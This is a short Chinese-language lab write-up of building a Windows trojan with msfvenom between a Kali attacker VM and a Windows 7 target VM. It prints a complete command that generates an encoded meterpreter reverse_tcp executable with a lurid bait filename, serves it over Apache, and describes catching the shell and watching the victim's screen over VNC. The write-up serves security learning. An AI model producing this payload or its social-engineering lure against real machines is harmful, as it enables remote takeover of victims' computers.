杂个人漏洞实战练习记录
记一次利用msfvenom制作windows恶意软件实战记录
文章目录
前言
路漫漫其修远兮,吾将上下而求索。
本文涉及以下知识点,去引用文章学习即可:
链接: 我是一个知识点
本文旨在网络安全学习记录,请勿用于任何黑客攻击,产生任何后果皆与笔者无关,后果自负。
一、实验过程
攻击机:kali虚拟机:192.168.66.74
靶机:win7虚拟机:192.168.66.58
1.使用msfvenom制作恶意软件如下图所示:
使用命令:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.66.74 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/点我看深田视频.exe
其中命令
-a:指系统架构如x86,x86_64,x64
-platform:指操作系统
-p:指payload
-b:指去掉坏字符 \x代表16进制 00 代表空字符
-e:指定编码
-i:指编码次数
-f:指定输出格式
-o:指定输出路径
2.使用命令service apache2 start开启apache服务,用靶机下载恶意程序,如下所示:
3.进入msfconsole,启用监听,设置payload,如下图所示:
4.攻击机运行run,靶机点击运行程序看深田视频:),攻击成功,如下图所示:
5.在攻击中启用vnc,成功监听靶机界面,更多渗透操作请看文章开头引用文章如下图所示:
总结
大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)
思路:
学习后渗透知识点